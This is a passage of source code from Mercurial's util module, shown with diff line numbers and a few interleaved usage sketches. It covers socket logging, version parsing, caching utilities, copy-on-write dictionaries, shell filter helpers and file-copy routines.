946 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
947 self.name, size, flags, len(res[0])))
948 self._writedata(res[0])
949
950 def recvfrom_into(self, res, buf, size, flags=0):
951 if not self.reads:
952 return
953
954 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
955 self.name, size, flags, res[0]))
956 self._writedata(buf[0:res[0]])
957
958 def recv_into(self, res, buf, size=0, flags=0):
959 if not self.reads:
960 return
961
962 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
963 self.name, size, flags, res))
964 self._writedata(buf[0:res])
965
966 def send(self, res, data, flags=0):
967 if not self.writes:
968 return
969
970 self.fh.write('%s> send(%d, %d) -> %d' % (
971 self.name, len(data), flags, len(res)))
972 self._writedata(data)
973
974 def sendall(self, res, data, flags=0):
975 if not self.writes:
976 return
977
 978 # Returns None on success, so don't bother reporting the return value.
979 self.fh.write('%s> sendall(%d, %d)' % (
980 self.name, len(data), flags))
981 self._writedata(data)
982
983 def sendto(self, res, data, flagsoraddress, address=None):
984 if not self.writes:
985 return
986
987 if address:
988 flags = flagsoraddress
989 else:
990 flags = 0
991
992 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
993 self.name, len(data), flags, address, res))
994 self._writedata(data)
995
996 def setblocking(self, res, flag):
997 if not self.states:
998 return
999
1000 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1001
1002 def settimeout(self, res, value):
1003 if not self.states:
1004 return
1005
1006 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1007
1008 def gettimeout(self, res):
1009 if not self.states:
1010 return
1011
1012 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1013
 1014 def setsockopt(self, res, level, optname, value):
 1015 if not self.states:
 1016 return
 1017
 1018 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
 1019 self.name, level, optname, value, res))
1020
1021 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1022 logdata=False):
1023 """Turn a socket into a logging socket."""
1024
1025 observer = socketobserver(logh, name, reads=reads, writes=writes,
1026 states=states, logdata=logdata)
1027 return socketproxy(fh, observer)
1028
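The socket analogue, sketched under the same assumptions (hypothetical peer address; the peer is assumed to answer the request):

    import io, socket
    from mercurial import util

    log = io.BytesIO()
    sock = socket.create_connection(('localhost', 8000))   # hypothetical
    sock = util.makeloggingsocket(log, sock, b'client', logdata=True)
    sock.sendall(b'ping\n')   # logs "client> sendall(5, 0)" + escaped data
    sock.recv(1024)           # logs "client> recv(1024, 0) -> <n>" + data
    # makefile() returns another logging proxy, so buffered I/O on the
    # resulting file object is observed as well.
    fh = sock.makefile(r'rb')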
796 1029 def version():
797 1030 """Return version information if available."""
798 1031 try:
799 1032 from . import __version__
800 1033 return __version__.version
801 1034 except ImportError:
802 1035 return 'unknown'
803 1036
804 1037 def versiontuple(v=None, n=4):
805 1038 """Parses a Mercurial version string into an N-tuple.
806 1039
807 1040 The version string to be parsed is specified with the ``v`` argument.
808 1041 If it isn't defined, the current Mercurial version string will be parsed.
809 1042
810 1043 ``n`` can be 2, 3, or 4. Here is how some version strings map to
811 1044 returned values:
812 1045
813 1046 >>> v = b'3.6.1+190-df9b73d2d444'
814 1047 >>> versiontuple(v, 2)
815 1048 (3, 6)
816 1049 >>> versiontuple(v, 3)
817 1050 (3, 6, 1)
818 1051 >>> versiontuple(v, 4)
819 1052 (3, 6, 1, '190-df9b73d2d444')
820 1053
821 1054 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
822 1055 (3, 6, 1, '190-df9b73d2d444+20151118')
823 1056
824 1057 >>> v = b'3.6'
825 1058 >>> versiontuple(v, 2)
826 1059 (3, 6)
827 1060 >>> versiontuple(v, 3)
828 1061 (3, 6, None)
829 1062 >>> versiontuple(v, 4)
830 1063 (3, 6, None, None)
831 1064
832 1065 >>> v = b'3.9-rc'
833 1066 >>> versiontuple(v, 2)
834 1067 (3, 9)
835 1068 >>> versiontuple(v, 3)
836 1069 (3, 9, None)
837 1070 >>> versiontuple(v, 4)
838 1071 (3, 9, None, 'rc')
839 1072
840 1073 >>> v = b'3.9-rc+2-02a8fea4289b'
841 1074 >>> versiontuple(v, 2)
842 1075 (3, 9)
843 1076 >>> versiontuple(v, 3)
844 1077 (3, 9, None)
845 1078 >>> versiontuple(v, 4)
846 1079 (3, 9, None, 'rc+2-02a8fea4289b')
847 1080 """
848 1081 if not v:
849 1082 v = version()
850 1083 parts = remod.split('[\+-]', v, 1)
851 1084 if len(parts) == 1:
852 1085 vparts, extra = parts[0], None
853 1086 else:
854 1087 vparts, extra = parts
855 1088
856 1089 vints = []
857 1090 for i in vparts.split('.'):
858 1091 try:
859 1092 vints.append(int(i))
860 1093 except ValueError:
861 1094 break
862 1095 # (3, 6) -> (3, 6, None)
863 1096 while len(vints) < 3:
864 1097 vints.append(None)
865 1098
866 1099 if n == 2:
867 1100 return (vints[0], vints[1])
868 1101 if n == 3:
869 1102 return (vints[0], vints[1], vints[2])
870 1103 if n == 4:
871 1104 return (vints[0], vints[1], vints[2], extra)
872 1105
873 1106 def cachefunc(func):
874 1107 '''cache the result of function calls'''
 875 1108 # XXX doesn't handle keyword args
876 1109 if func.__code__.co_argcount == 0:
877 1110 cache = []
878 1111 def f():
879 1112 if len(cache) == 0:
880 1113 cache.append(func())
881 1114 return cache[0]
882 1115 return f
883 1116 cache = {}
884 1117 if func.__code__.co_argcount == 1:
885 1118 # we gain a small amount of time because
886 1119 # we don't need to pack/unpack the list
887 1120 def f(arg):
888 1121 if arg not in cache:
889 1122 cache[arg] = func(arg)
890 1123 return cache[arg]
891 1124 else:
892 1125 def f(*args):
893 1126 if args not in cache:
894 1127 cache[args] = func(*args)
895 1128 return cache[args]
896 1129
897 1130 return f
898 1131
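Usage sketch: `cachefunc` works as a decorator, memoizing on positional arguments (keyword arguments are not handled, per the XXX above):

    from mercurial import util

    @util.cachefunc
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    fib(30)   # each distinct n is computed once; recursion hits the cache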
899 1132 class cow(object):
900 1133 """helper class to make copy-on-write easier
901 1134
902 1135 Call preparewrite before doing any writes.
903 1136 """
904 1137
905 1138 def preparewrite(self):
906 1139 """call this before writes, return self or a copied new object"""
907 1140 if getattr(self, '_copied', 0):
908 1141 self._copied -= 1
909 1142 return self.__class__(self)
910 1143 return self
911 1144
912 1145 def copy(self):
913 1146 """always do a cheap copy"""
914 1147 self._copied = getattr(self, '_copied', 0) + 1
915 1148 return self
916 1149
917 1150 class sortdict(collections.OrderedDict):
918 1151 '''a simple sorted dictionary
919 1152
920 1153 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
921 1154 >>> d2 = d1.copy()
922 1155 >>> d2
923 1156 sortdict([('a', 0), ('b', 1)])
924 1157 >>> d2.update([(b'a', 2)])
925 1158 >>> list(d2.keys()) # should still be in last-set order
926 1159 ['b', 'a']
927 1160 '''
928 1161
929 1162 def __setitem__(self, key, value):
930 1163 if key in self:
931 1164 del self[key]
932 1165 super(sortdict, self).__setitem__(key, value)
933 1166
934 1167 if pycompat.ispypy:
935 1168 # __setitem__() isn't called as of PyPy 5.8.0
936 1169 def update(self, src):
937 1170 if isinstance(src, dict):
938 1171 src = src.iteritems()
939 1172 for k, v in src:
940 1173 self[k] = v
941 1174
942 1175 class cowdict(cow, dict):
943 1176 """copy-on-write dict
944 1177
945 1178 Be sure to call d = d.preparewrite() before writing to d.
946 1179
947 1180 >>> a = cowdict()
948 1181 >>> a is a.preparewrite()
949 1182 True
950 1183 >>> b = a.copy()
951 1184 >>> b is a
952 1185 True
953 1186 >>> c = b.copy()
954 1187 >>> c is a
955 1188 True
956 1189 >>> a = a.preparewrite()
957 1190 >>> b is a
958 1191 False
959 1192 >>> a is a.preparewrite()
960 1193 True
961 1194 >>> c = c.preparewrite()
962 1195 >>> b is c
963 1196 False
964 1197 >>> b is b.preparewrite()
965 1198 True
966 1199 """
967 1200
968 1201 class cowsortdict(cow, sortdict):
969 1202 """copy-on-write sortdict
970 1203
971 1204 Be sure to call d = d.preparewrite() before writing to d.
972 1205 """
973 1206
974 1207 class transactional(object):
975 1208 """Base class for making a transactional type into a context manager."""
976 1209 __metaclass__ = abc.ABCMeta
977 1210
978 1211 @abc.abstractmethod
979 1212 def close(self):
980 1213 """Successfully closes the transaction."""
981 1214
982 1215 @abc.abstractmethod
983 1216 def release(self):
984 1217 """Marks the end of the transaction.
985 1218
986 1219 If the transaction has not been closed, it will be aborted.
987 1220 """
988 1221
989 1222 def __enter__(self):
990 1223 return self
991 1224
992 1225 def __exit__(self, exc_type, exc_val, exc_tb):
993 1226 try:
994 1227 if exc_type is None:
995 1228 self.close()
996 1229 finally:
997 1230 self.release()
998 1231
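A toy subclass showing the contract (illustrative only): on a clean exit close() runs and then release(); on an exception only release() runs, aborting the transaction:

    from mercurial import util

    class demotxn(util.transactional):
        def close(self):
            print('committed')
        def release(self):
            print('cleaned up')

    with demotxn():
        pass                   # prints: committed, then cleaned up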
999 1232 @contextlib.contextmanager
1000 1233 def acceptintervention(tr=None):
1001 1234 """A context manager that closes the transaction on InterventionRequired
1002 1235
1003 1236 If no transaction was provided, this simply runs the body and returns
1004 1237 """
1005 1238 if not tr:
1006 1239 yield
1007 1240 return
1008 1241 try:
1009 1242 yield
1010 1243 tr.close()
1011 1244 except error.InterventionRequired:
1012 1245 tr.close()
1013 1246 raise
1014 1247 finally:
1015 1248 tr.release()
1016 1249
1017 1250 @contextlib.contextmanager
1018 1251 def nullcontextmanager():
1019 1252 yield
1020 1253
1021 1254 class _lrucachenode(object):
1022 1255 """A node in a doubly linked list.
1023 1256
1024 1257 Holds a reference to nodes on either side as well as a key-value
1025 1258 pair for the dictionary entry.
1026 1259 """
1027 1260 __slots__ = (u'next', u'prev', u'key', u'value')
1028 1261
1029 1262 def __init__(self):
1030 1263 self.next = None
1031 1264 self.prev = None
1032 1265
1033 1266 self.key = _notset
1034 1267 self.value = None
1035 1268
1036 1269 def markempty(self):
1037 1270 """Mark the node as emptied."""
1038 1271 self.key = _notset
1039 1272
1040 1273 class lrucachedict(object):
1041 1274 """Dict that caches most recent accesses and sets.
1042 1275
1043 1276 The dict consists of an actual backing dict - indexed by original
1044 1277 key - and a doubly linked circular list defining the order of entries in
1045 1278 the cache.
1046 1279
1047 1280 The head node is the newest entry in the cache. If the cache is full,
1048 1281 we recycle head.prev and make it the new head. Cache accesses result in
1049 1282 the node being moved to before the existing head and being marked as the
1050 1283 new head node.
1051 1284 """
1052 1285 def __init__(self, max):
1053 1286 self._cache = {}
1054 1287
1055 1288 self._head = head = _lrucachenode()
1056 1289 head.prev = head
1057 1290 head.next = head
1058 1291 self._size = 1
1059 1292 self._capacity = max
1060 1293
1061 1294 def __len__(self):
1062 1295 return len(self._cache)
1063 1296
1064 1297 def __contains__(self, k):
1065 1298 return k in self._cache
1066 1299
1067 1300 def __iter__(self):
1068 1301 # We don't have to iterate in cache order, but why not.
1069 1302 n = self._head
1070 1303 for i in range(len(self._cache)):
1071 1304 yield n.key
1072 1305 n = n.next
1073 1306
1074 1307 def __getitem__(self, k):
1075 1308 node = self._cache[k]
1076 1309 self._movetohead(node)
1077 1310 return node.value
1078 1311
1079 1312 def __setitem__(self, k, v):
1080 1313 node = self._cache.get(k)
1081 1314 # Replace existing value and mark as newest.
1082 1315 if node is not None:
1083 1316 node.value = v
1084 1317 self._movetohead(node)
1085 1318 return
1086 1319
1087 1320 if self._size < self._capacity:
1088 1321 node = self._addcapacity()
1089 1322 else:
1090 1323 # Grab the last/oldest item.
1091 1324 node = self._head.prev
1092 1325
1093 1326 # At capacity. Kill the old entry.
1094 1327 if node.key is not _notset:
1095 1328 del self._cache[node.key]
1096 1329
1097 1330 node.key = k
1098 1331 node.value = v
1099 1332 self._cache[k] = node
1100 1333 # And mark it as newest entry. No need to adjust order since it
1101 1334 # is already self._head.prev.
1102 1335 self._head = node
1103 1336
1104 1337 def __delitem__(self, k):
1105 1338 node = self._cache.pop(k)
1106 1339 node.markempty()
1107 1340
1108 1341 # Temporarily mark as newest item before re-adjusting head to make
1109 1342 # this node the oldest item.
1110 1343 self._movetohead(node)
1111 1344 self._head = node.next
1112 1345
1113 1346 # Additional dict methods.
1114 1347
1115 1348 def get(self, k, default=None):
1116 1349 try:
1117 1350 return self._cache[k].value
1118 1351 except KeyError:
1119 1352 return default
1120 1353
1121 1354 def clear(self):
1122 1355 n = self._head
1123 1356 while n.key is not _notset:
1124 1357 n.markempty()
1125 1358 n = n.next
1126 1359
1127 1360 self._cache.clear()
1128 1361
1129 1362 def copy(self):
1130 1363 result = lrucachedict(self._capacity)
1131 1364 n = self._head.prev
1132 1365 # Iterate in oldest-to-newest order, so the copy has the right ordering
1133 1366 for i in range(len(self._cache)):
1134 1367 result[n.key] = n.value
1135 1368 n = n.prev
1136 1369 return result
1137 1370
1138 1371 def _movetohead(self, node):
1139 1372 """Mark a node as the newest, making it the new head.
1140 1373
1141 1374 When a node is accessed, it becomes the freshest entry in the LRU
1142 1375 list, which is denoted by self._head.
1143 1376
1144 1377 Visually, let's make ``N`` the new head node (* denotes head):
1145 1378
1146 1379 previous/oldest <-> head <-> next/next newest
1147 1380
1148 1381 ----<->--- A* ---<->-----
1149 1382 | |
1150 1383 E <-> D <-> N <-> C <-> B
1151 1384
1152 1385 To:
1153 1386
1154 1387 ----<->--- N* ---<->-----
1155 1388 | |
1156 1389 E <-> D <-> C <-> B <-> A
1157 1390
1158 1391 This requires the following moves:
1159 1392
1160 1393 C.next = D (node.prev.next = node.next)
1161 1394 D.prev = C (node.next.prev = node.prev)
1162 1395 E.next = N (head.prev.next = node)
1163 1396 N.prev = E (node.prev = head.prev)
1164 1397 N.next = A (node.next = head)
1165 1398 A.prev = N (head.prev = node)
1166 1399 """
1167 1400 head = self._head
1168 1401 # C.next = D
1169 1402 node.prev.next = node.next
1170 1403 # D.prev = C
1171 1404 node.next.prev = node.prev
1172 1405 # N.prev = E
1173 1406 node.prev = head.prev
1174 1407 # N.next = A
1175 1408 # It is tempting to do just "head" here, however if node is
1176 1409 # adjacent to head, this will do bad things.
1177 1410 node.next = head.prev.next
1178 1411 # E.next = N
1179 1412 node.next.prev = node
1180 1413 # A.prev = N
1181 1414 node.prev.next = node
1182 1415
1183 1416 self._head = node
1184 1417
1185 1418 def _addcapacity(self):
1186 1419 """Add a node to the circular linked list.
1187 1420
1188 1421 The new node is inserted before the head node.
1189 1422 """
1190 1423 head = self._head
1191 1424 node = _lrucachenode()
1192 1425 head.prev.next = node
1193 1426 node.prev = head.prev
1194 1427 node.next = head
1195 1428 head.prev = node
1196 1429 self._size += 1
1197 1430 return node
1198 1431
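Behavior sketch for the LRU semantics described above:

    from mercurial import util

    d = util.lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']         # access makes 'a' the newest entry
    d['c'] = 3     # at capacity: evicts 'b', the oldest entry
    'b' in d       # False
    'a' in d       # True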
1199 1432 def lrucachefunc(func):
1200 1433 '''cache most recent results of function calls'''
1201 1434 cache = {}
1202 1435 order = collections.deque()
1203 1436 if func.__code__.co_argcount == 1:
1204 1437 def f(arg):
1205 1438 if arg not in cache:
1206 1439 if len(cache) > 20:
1207 1440 del cache[order.popleft()]
1208 1441 cache[arg] = func(arg)
1209 1442 else:
1210 1443 order.remove(arg)
1211 1444 order.append(arg)
1212 1445 return cache[arg]
1213 1446 else:
1214 1447 def f(*args):
1215 1448 if args not in cache:
1216 1449 if len(cache) > 20:
1217 1450 del cache[order.popleft()]
1218 1451 cache[args] = func(*args)
1219 1452 else:
1220 1453 order.remove(args)
1221 1454 order.append(args)
1222 1455 return cache[args]
1223 1456
1224 1457 return f
1225 1458
1226 1459 class propertycache(object):
1227 1460 def __init__(self, func):
1228 1461 self.func = func
1229 1462 self.name = func.__name__
1230 1463 def __get__(self, obj, type=None):
1231 1464 result = self.func(obj)
1232 1465 self.cachevalue(obj, result)
1233 1466 return result
1234 1467
1235 1468 def cachevalue(self, obj, value):
1236 1469 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1237 1470 obj.__dict__[self.name] = value
1238 1471
1239 1472 def clearcachedproperty(obj, prop):
1240 1473 '''clear a cached property value, if one has been set'''
1241 1474 if prop in obj.__dict__:
1242 1475 del obj.__dict__[prop]
1243 1476
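`propertycache` is a non-data descriptor: the first access computes the value and stores it in the instance __dict__, which then shadows the descriptor on later lookups. A sketch:

    from mercurial import util

    class thing(object):
        @util.propertycache
        def expensive(self):
            print('computing')
            return 42

    t = thing()
    t.expensive    # prints 'computing', returns 42, caches in t.__dict__
    t.expensive    # served from t.__dict__; the descriptor is not invoked
    util.clearcachedproperty(t, 'expensive')   # next access recomputes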
1244 1477 def pipefilter(s, cmd):
1245 1478 '''filter string S through command CMD, returning its output'''
1246 1479 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1247 1480 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1248 1481 pout, perr = p.communicate(s)
1249 1482 return pout
1250 1483
1251 1484 def tempfilter(s, cmd):
1252 1485 '''filter string S through a pair of temporary files with CMD.
1253 1486 CMD is used as a template to create the real command to be run,
1254 1487 with the strings INFILE and OUTFILE replaced by the real names of
1255 1488 the temporary files generated.'''
1256 1489 inname, outname = None, None
1257 1490 try:
1258 1491 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1259 1492 fp = os.fdopen(infd, r'wb')
1260 1493 fp.write(s)
1261 1494 fp.close()
1262 1495 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1263 1496 os.close(outfd)
1264 1497 cmd = cmd.replace('INFILE', inname)
1265 1498 cmd = cmd.replace('OUTFILE', outname)
1266 1499 code = os.system(cmd)
1267 1500 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1268 1501 code = 0
1269 1502 if code:
1270 1503 raise Abort(_("command '%s' failed: %s") %
1271 1504 (cmd, explainexit(code)))
1272 1505 return readfile(outname)
1273 1506 finally:
1274 1507 try:
1275 1508 if inname:
1276 1509 os.unlink(inname)
1277 1510 except OSError:
1278 1511 pass
1279 1512 try:
1280 1513 if outname:
1281 1514 os.unlink(outname)
1282 1515 except OSError:
1283 1516 pass
1284 1517
1285 1518 filtertable = {
1286 1519 'tempfile:': tempfilter,
1287 1520 'pipe:': pipefilter,
1288 1521 }
1289 1522
1290 1523 def filter(s, cmd):
1291 1524 "filter a string through a command that transforms its input to its output"
1292 1525 for name, fn in filtertable.iteritems():
1293 1526 if cmd.startswith(name):
1294 1527 return fn(s, cmd[len(name):].lstrip())
1295 1528 return pipefilter(s, cmd)
1296 1529
1297 1530 def binary(s):
1298 1531 """return true if a string is binary data"""
1299 1532 return bool(s and '\0' in s)
1300 1533
1301 1534 def increasingchunks(source, min=1024, max=65536):
1302 1535 '''return no less than min bytes per chunk while data remains,
1303 1536 doubling min after each chunk until it reaches max'''
1304 1537 def log2(x):
1305 1538 if not x:
1306 1539 return 0
1307 1540 i = 0
1308 1541 while x:
1309 1542 x >>= 1
1310 1543 i += 1
1311 1544 return i - 1
1312 1545
1313 1546 buf = []
1314 1547 blen = 0
1315 1548 for chunk in source:
1316 1549 buf.append(chunk)
1317 1550 blen += len(chunk)
1318 1551 if blen >= min:
1319 1552 if min < max:
1320 1553 min = min << 1
1321 1554 nmin = 1 << log2(blen)
1322 1555 if nmin > min:
1323 1556 min = nmin
1324 1557 if min > max:
1325 1558 min = max
1326 1559 yield ''.join(buf)
1327 1560 blen = 0
1328 1561 buf = []
1329 1562 if buf:
1330 1563 yield ''.join(buf)
1331 1564
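A worked illustration of the doubling: twenty 400-byte chunks regroup into progressively larger ones:

    from mercurial import util

    src = iter([b'x' * 400] * 20)
    [len(c) for c in util.increasingchunks(src, min=1024, max=4096)]
    # -> [1200, 2400, 4400]: each yield meets the current minimum,
    # which doubles (capped at max) after every chunk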
1332 1565 Abort = error.Abort
1333 1566
1334 1567 def always(fn):
1335 1568 return True
1336 1569
1337 1570 def never(fn):
1338 1571 return False
1339 1572
1340 1573 def nogc(func):
1341 1574 """disable garbage collector
1342 1575
1343 1576 Python's garbage collector triggers a GC each time a certain number of
1344 1577 container objects (the number being defined by gc.get_threshold()) are
1345 1578 allocated even when marked not to be tracked by the collector. Tracking has
1346 1579 no effect on when GCs are triggered, only on what objects the GC looks
1347 1580 into. As a workaround, disable GC while building complex (huge)
1348 1581 containers.
1349 1582
 1350 1583 This garbage collector issue has been fixed in 2.7, but it still affects
 1351 1584 CPython's performance.
1352 1585 """
1353 1586 def wrapper(*args, **kwargs):
1354 1587 gcenabled = gc.isenabled()
1355 1588 gc.disable()
1356 1589 try:
1357 1590 return func(*args, **kwargs)
1358 1591 finally:
1359 1592 if gcenabled:
1360 1593 gc.enable()
1361 1594 return wrapper
1362 1595
1363 1596 if pycompat.ispypy:
1364 1597 # PyPy runs slower with gc disabled
1365 1598 nogc = lambda x: x
1366 1599
1367 1600 def pathto(root, n1, n2):
1368 1601 '''return the relative path from one place to another.
1369 1602 root should use os.sep to separate directories
1370 1603 n1 should use os.sep to separate directories
1371 1604 n2 should use "/" to separate directories
1372 1605 returns an os.sep-separated path.
1373 1606
1374 1607 If n1 is a relative path, it's assumed it's
1375 1608 relative to root.
1376 1609 n2 should always be relative to root.
1377 1610 '''
1378 1611 if not n1:
1379 1612 return localpath(n2)
1380 1613 if os.path.isabs(n1):
1381 1614 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1382 1615 return os.path.join(root, localpath(n2))
1383 1616 n2 = '/'.join((pconvert(root), n2))
1384 1617 a, b = splitpath(n1), n2.split('/')
1385 1618 a.reverse()
1386 1619 b.reverse()
1387 1620 while a and b and a[-1] == b[-1]:
1388 1621 a.pop()
1389 1622 b.pop()
1390 1623 b.reverse()
1391 1624 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1392 1625
1393 1626 def mainfrozen():
1394 1627 """return True if we are a frozen executable.
1395 1628
1396 1629 The code supports py2exe (most common, Windows only) and tools/freeze
1397 1630 (portable, not much used).
1398 1631 """
1399 1632 return (safehasattr(sys, "frozen") or # new py2exe
1400 1633 safehasattr(sys, "importers") or # old py2exe
1401 1634 imp.is_frozen(u"__main__")) # tools/freeze
1402 1635
1403 1636 # the location of data files matching the source code
1404 1637 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1405 1638 # executable version (py2exe) doesn't support __file__
1406 1639 datapath = os.path.dirname(pycompat.sysexecutable)
1407 1640 else:
1408 1641 datapath = os.path.dirname(pycompat.fsencode(__file__))
1409 1642
1410 1643 i18n.setdatapath(datapath)
1411 1644
1412 1645 _hgexecutable = None
1413 1646
1414 1647 def hgexecutable():
1415 1648 """return location of the 'hg' executable.
1416 1649
1417 1650 Defaults to $HG or 'hg' in the search path.
1418 1651 """
1419 1652 if _hgexecutable is None:
1420 1653 hg = encoding.environ.get('HG')
1421 1654 mainmod = sys.modules[r'__main__']
1422 1655 if hg:
1423 1656 _sethgexecutable(hg)
1424 1657 elif mainfrozen():
1425 1658 if getattr(sys, 'frozen', None) == 'macosx_app':
1426 1659 # Env variable set by py2app
1427 1660 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1428 1661 else:
1429 1662 _sethgexecutable(pycompat.sysexecutable)
1430 1663 elif (os.path.basename(
1431 1664 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1432 1665 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1433 1666 else:
1434 1667 exe = findexe('hg') or os.path.basename(sys.argv[0])
1435 1668 _sethgexecutable(exe)
1436 1669 return _hgexecutable
1437 1670
1438 1671 def _sethgexecutable(path):
1439 1672 """set location of the 'hg' executable"""
1440 1673 global _hgexecutable
1441 1674 _hgexecutable = path
1442 1675
1443 1676 def _testfileno(f, stdf):
1444 1677 fileno = getattr(f, 'fileno', None)
1445 1678 try:
1446 1679 return fileno and fileno() == stdf.fileno()
1447 1680 except io.UnsupportedOperation:
1448 1681 return False # fileno() raised UnsupportedOperation
1449 1682
1450 1683 def isstdin(f):
1451 1684 return _testfileno(f, sys.__stdin__)
1452 1685
1453 1686 def isstdout(f):
1454 1687 return _testfileno(f, sys.__stdout__)
1455 1688
1456 1689 def shellenviron(environ=None):
1457 1690 """return environ with optional override, useful for shelling out"""
1458 1691 def py2shell(val):
1459 1692 'convert python object into string that is useful to shell'
1460 1693 if val is None or val is False:
1461 1694 return '0'
1462 1695 if val is True:
1463 1696 return '1'
1464 1697 return pycompat.bytestr(val)
1465 1698 env = dict(encoding.environ)
1466 1699 if environ:
1467 1700 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1468 1701 env['HG'] = hgexecutable()
1469 1702 return env
1470 1703
1471 1704 def system(cmd, environ=None, cwd=None, out=None):
1472 1705 '''enhanced shell command execution.
1473 1706 run with environment maybe modified, maybe in different dir.
1474 1707
1475 1708 if out is specified, it is assumed to be a file-like object that has a
1476 1709 write() method. stdout and stderr will be redirected to out.'''
1477 1710 try:
1478 1711 stdout.flush()
1479 1712 except Exception:
1480 1713 pass
1481 1714 cmd = quotecommand(cmd)
1482 1715 env = shellenviron(environ)
1483 1716 if out is None or isstdout(out):
1484 1717 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1485 1718 env=env, cwd=cwd)
1486 1719 else:
1487 1720 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1488 1721 env=env, cwd=cwd, stdout=subprocess.PIPE,
1489 1722 stderr=subprocess.STDOUT)
1490 1723 for line in iter(proc.stdout.readline, ''):
1491 1724 out.write(line)
1492 1725 proc.wait()
1493 1726 rc = proc.returncode
1494 1727 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1495 1728 rc = 0
1496 1729 return rc
1497 1730
1498 1731 def checksignature(func):
1499 1732 '''wrap a function with code to check for calling errors'''
1500 1733 def check(*args, **kwargs):
1501 1734 try:
1502 1735 return func(*args, **kwargs)
1503 1736 except TypeError:
1504 1737 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1505 1738 raise error.SignatureError
1506 1739 raise
1507 1740
1508 1741 return check
1509 1742
 1510 1743 # a whitelist of known filesystems where hardlinks work reliably
1511 1744 _hardlinkfswhitelist = {
1512 1745 'btrfs',
1513 1746 'ext2',
1514 1747 'ext3',
1515 1748 'ext4',
1516 1749 'hfs',
1517 1750 'jfs',
1518 1751 'NTFS',
1519 1752 'reiserfs',
1520 1753 'tmpfs',
1521 1754 'ufs',
1522 1755 'xfs',
1523 1756 'zfs',
1524 1757 }
1525 1758
1526 1759 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1527 1760 '''copy a file, preserving mode and optionally other stat info like
1528 1761 atime/mtime
1529 1762
1530 1763 checkambig argument is used with filestat, and is useful only if
1531 1764 destination file is guarded by any lock (e.g. repo.lock or
1532 1765 repo.wlock).
1533 1766
1534 1767 copystat and checkambig should be exclusive.
1535 1768 '''
1536 1769 assert not (copystat and checkambig)
1537 1770 oldstat = None
1538 1771 if os.path.lexists(dest):
1539 1772 if checkambig:
1540 1773 oldstat = filestat.frompath(dest)
1541 1774 unlink(dest)
1542 1775 if hardlink:
1543 1776 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1544 1777 # unless we are confident that dest is on a whitelisted filesystem.
1545 1778 try:
1546 1779 fstype = getfstype(os.path.dirname(dest))
1547 1780 except OSError:
1548 1781 fstype = None
1549 1782 if fstype not in _hardlinkfswhitelist:
1550 1783 hardlink = False
1551 1784 if hardlink:
1552 1785 try:
1553 1786 oslink(src, dest)
1554 1787 return
1555 1788 except (IOError, OSError):
1556 1789 pass # fall back to normal copy
1557 1790 if os.path.islink(src):
1558 1791 os.symlink(os.readlink(src), dest)
1559 1792 # copytime is ignored for symlinks, but in general copytime isn't needed
1560 1793 # for them anyway
1561 1794 else:
1562 1795 try:
1563 1796 shutil.copyfile(src, dest)
1564 1797 if copystat:
1565 1798 # copystat also copies mode
1566 1799 shutil.copystat(src, dest)
1567 1800 else:
1568 1801 shutil.copymode(src, dest)
1569 1802 if oldstat and oldstat.stat:
1570 1803 newstat = filestat.frompath(dest)
1571 1804 if newstat.isambig(oldstat):
1572 1805 # stat of copied file is ambiguous to original one
1573 1806 advanced = (
1574 1807 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1575 1808 os.utime(dest, (advanced, advanced))
1576 1809 except shutil.Error as inst:
1577 1810 raise Abort(str(inst))
1578 1811
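# copyfile() usage sketch; the paths are hypothetical:
#
#   copyfile(b'a.txt', b'b.txt', hardlink=True)
#   # oslink() is attempted only when the destination filesystem is in
#   # _hardlinkfswhitelist (hardlinks misbehave on CIFS, see issue4546),
#   # and any IOError/OSError falls back to a plain copy
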
1579 1812 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1580 1813 """Copy a directory tree using hardlinks if possible."""
1581 1814 num = 0
1582 1815
1583 1816 gettopic = lambda: hardlink and _('linking') or _('copying')
1584 1817
1585 1818 if os.path.isdir(src):
1586 1819 if hardlink is None:
1587 1820 hardlink = (os.stat(src).st_dev ==
1588 1821 os.stat(os.path.dirname(dst)).st_dev)
1589 1822 topic = gettopic()
1590 1823 os.mkdir(dst)
1591 1824 for name, kind in listdir(src):
1592 1825 srcname = os.path.join(src, name)
1593 1826 dstname = os.path.join(dst, name)
1594 1827 def nprog(t, pos):
1595 1828 if pos is not None:
1596 1829 return progress(t, pos + num)
1597 1830 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1598 1831 num += n
1599 1832 else:
1600 1833 if hardlink is None:
1601 1834 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1602 1835 os.stat(os.path.dirname(dst)).st_dev)
1603 1836 topic = gettopic()
1604 1837
1605 1838 if hardlink:
1606 1839 try:
